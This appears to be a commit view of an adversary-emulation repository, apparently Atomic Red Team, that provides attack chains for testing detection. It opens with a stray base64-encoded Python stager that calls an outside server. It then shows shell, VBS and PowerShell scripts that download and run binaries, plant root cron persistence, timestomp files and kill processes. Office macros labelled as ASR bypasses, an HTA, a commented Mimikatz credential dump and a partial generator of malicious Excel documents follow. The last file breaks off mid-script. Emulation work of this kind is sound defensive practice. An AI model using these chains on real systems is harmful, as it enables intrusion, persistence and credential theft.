import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))
ARTifacts/Chain_Reactions/dragonstail_benign.ps1
+37
View File
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
# powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
ARTifacts/Chain_Reactions/mirai-reaction-stage-01.sh
Executable
+17
View File
@@ -0,0 +1,17 @@
#! /bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# Tactic: Discovery
# Technique: T1082 - System Information discovery
MIRAI_EXT=`uname -m`
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x mirai.$MIRAI_EXT
./mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf mirai.$MIRAI_EXT
ARTifacts/Chain_Reactions/qbot_infection_reaction.vbs
+34
View File
@@ -0,0 +1,34 @@
On Error Resume Next
' Properly declare everything
Dim shell, remoteFile, wmi_os_caption, securityCenterWMI, avItems, fso, localFile, bitsadminReturn, objProcess
Set shell = WScript.CreateObject("WScript.Shell")
' Tactic: Discovery
' Technique: T1082 - System Information Discovery
Set wmi_os_caption = shell.Exec("wmic OS get Caption /value")
' Tactic: Discovery
' Technique: T1518.001 - Software Discovery: Security Software Discovery
Set securityCenterWMI = GetObject("winmgmts:\\.\root\SecurityCenter2")
Set avItems = securityCenterWMI.ExecQuery("Select * From AntiVirusProduct")
Set fso = CreateObject("Scripting.FileSystemObject")
localFile = fso.GetSpecialFolder(2) & "\Atomic_Qbot.exe"
' Tactic: Command and Control
' Technique: T1105 - Ingress Tool Transfer
bitsadminReturn = shell.Run("bit"&"sadmin /transfer qcxjb" & Second(Now) & " /Priority HIGH " & "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.exe " & localFile, 0, True)
' Tactic: Defense Evasion
' Technique: T1036 - Masquerading
MsgBox "The file can't be opened because there are problems with the content.", 0, "Microsoft Word"
' Tactic: Execution
' Technique: T1047 - Windows Management Instrumentation
If (bitsadminReturn = 0) And (fso.FileExists(localFile)) Then
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
objProcess.Create localFile
End If
ARTifacts/Chain_Reactions/rocke-and-roll-stage-01.sh
+10
View File
@@ -0,0 +1,10 @@
#! /bin/bash
# Tactic: Defense Evasion
# Technique: T1027 - Obfuscated Files or Information
bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
# If you want to skip the base64 process, uncomment the following line:
# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh
+81
View File
@@ -0,0 +1,81 @@
IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
YQpiCmM=
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh
+90
View File
@@ -0,0 +1,90 @@
#! /bin/bash
function c() {
pkill -f sourplum
pkill -f xmrig
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f minexmr
pkill -f minerd
pkill -f minergate
pkill -f kworker34
pkill -f Xbash
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Discovery
# Technique: T1057 - Process Discovery
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
# Tactic: Discovery
# Technique: T1049 - System Network Connections Discovery
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
}
function b() {
mkdir -p /var/tmp
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 1777 /var/tmp
# Tactic: Defense Evasion
# Technique: T1036 - Masquerading
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
}
function a() {
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
# Tactic: Persistence
# Technique: T1168 - Local Job Scheduling
echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 755 /etc/cron.daily/oanacroner
# Tactic: Defense Evasion
# Technique: T1099 - Timestomp
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
}
a
b
c
ARTifacts/Initial_Access/Atomic.doc
BIN
View File
Binary file not shown.
ARTifacts/Initial_Access/AtomicHTA.hta
+29
View File
@@ -0,0 +1,29 @@
<html>
<script language="JScript">
// Type One
// Child of Explorer, cmd.exe
var ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}";
var SW = GetObject("new:" + ShellWindows).Item();
SW.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", 'C:\\Windows\\System32', null, 0);
// Type Two
// Child of wmiprvse
var strComputer = ".";
var objWMIService = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2");
var objStartup = objWMIService.Get("Win32_ProcessStartup");
var objConfig = objStartup.SpawnInstance_();
objConfig.ShowWindow = 0;
var objProcess = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2:Win32_Process");
var intProcessID;
objProcess.Create("cmd.exe", null, objConfig, intProcessID);
// Type Three
// Child of mshta.exe
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
close();
</script>
</html>
ARTifacts/Initial_Access/Listener.md
+26
View File
@@ -0,0 +1,26 @@
# Listeners
Simple methods to simulate C2 server
## Python
python3
`python3 -m http.server 9000`
python2
`python -m SimpleHTTPServer 9000`
## PowerShell
[PowerShell Webserver](https://gallery.technet.microsoft.com/scriptcenter/Powershell-Webserver-74dcf466)
Start webserver with binding to http://localhost:8080/ (assuming the script is in the current directory):
PowerShell
`.\Start-Webserver.ps1`
Start webserver with binding to all IP addresses of the system and port 8080 (assuming the script is in the current directory).
Administrative rights are necessary:
PowerShell
`.\Start-Webserver.ps1 "http://+:8080/"`
ARTifacts/Initial_Access/Office_Macro_COM.md
+55
View File
@@ -0,0 +1,55 @@
# Office Macro - COM
reference: https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3
### WordShellExecute
Word.
explorer->cmd->powershell.
```
Sub ASR_bypass_create_child_process_rule4()
Const ShellWindows = _
"{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
Set SW = GetObject("new:" & ShellWindows).Item()
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
End Sub
```
### WordWmicCreateProcess
Word.
Wmiprvse.exe->cmd->powershell.
```
Sub ASR_bypass_create_child_process_rule5()
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", Null, objConfig, intProcessID
End Sub
```
### WordBenignWMICCreateProcess
Word.
Wmiprvse.exe->cmd->powershell.
This method does not execute mimikatz.
```
Sub ASR_bypass_create_child_process_rule5()
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1')", Null, objConfig, intProcessID
End Sub
```
ARTifacts/Initial_Access/Zipped_Malware.md
+9
View File
@@ -0,0 +1,9 @@
# Zipped Malware
A common method actors use to deliver is through zip attachments in email.
## ZIP + VBS Example
Take the following [qbot chain reaction](https://github.com/redcanaryco/atomic-red-team/blob/master/ARTifacts/Chain_Reactions/qbot_infection_reaction.vbs) and compress (zip) the vbs file to be used for delivery.
Simulate other file types by zipping and deliver to the receiving device.
ARTifacts/Initial_Access/generate-macro.ps1
+560
View File
@@ -0,0 +1,560 @@
#Adopted and Originally Coded by Matt Nelson (@enigma0x3)
#Reference: https://github.com/enigma0x3/Generate-Macro/blob/master/Generate-Macro.ps1
<#
.SYNOPSIS
Standalone Powershell script that will generate a malicious Microsoft Office document with a specified payload and persistence method
.DESCRIPTION
This script will generate malicious Microsoft Excel Documents that contain VBA macros.
The script will display a menu of different attacks, all with different ASR Bypass methods. Once an attack is chosen.
When naming the document, don't include a file extension.
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.Attack Types
All 7 instances represent different ASR Bypasses based on research performed by great folks within the industry. All macros were absorbed from https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3.
Additional references:
- https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
- https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
- https://www.darkoperator.com/blog/2017/11/8/windows-defender-exploit-guard-asr-obfuscated-script-rule
- https://posts.specterops.io/the-emet-attack-surface-reduction-replacement-in-windows-10-rs3-the-good-the-bad-and-the-ugly-34d5a253f3df
- https://oddvar.moe/2018/03/15/windows-defender-attack-surface-reduction-rules-bypass/
.EXAMPLE
PS> ./Generate-Macro.ps1
Enter the name of the document (Do not include a file extension): FinancialData
--------Select Attack---------
1. Chain Reaction Download and execute with Excel.
2. Chain Reaction Download and execute with Excel, wmiprvse
3. Chain Reaction Download and execute with Excel, wmiprvse benign
4. Chain Reaction Download and execute with Excel Shell
5. Chain Reaction Download and execute with Excel ShellBrowserWindow
6. Chain Reaction Download and execute with Excel WshShell
7. Chain Reaction Download and execute with Excel and POST C2.
8. Chain Reaction Download and execute with Excel and GET C2.
------------------------------
Saved to file C:\Users\Malware\Desktop\FinancialData.xls
PS>
#>
$global:defLoc = "$env:userprofile\Desktop"
$global:Name = Read-Host "Enter the name of the document (Do not include a file extension)"
$global:Name = $global:Name + ".xls"
$global:FullName = "$global:defLoc\$global:Name"
function Excel-Shell {
<#
.SYNOPSIS
Standard macro execution.
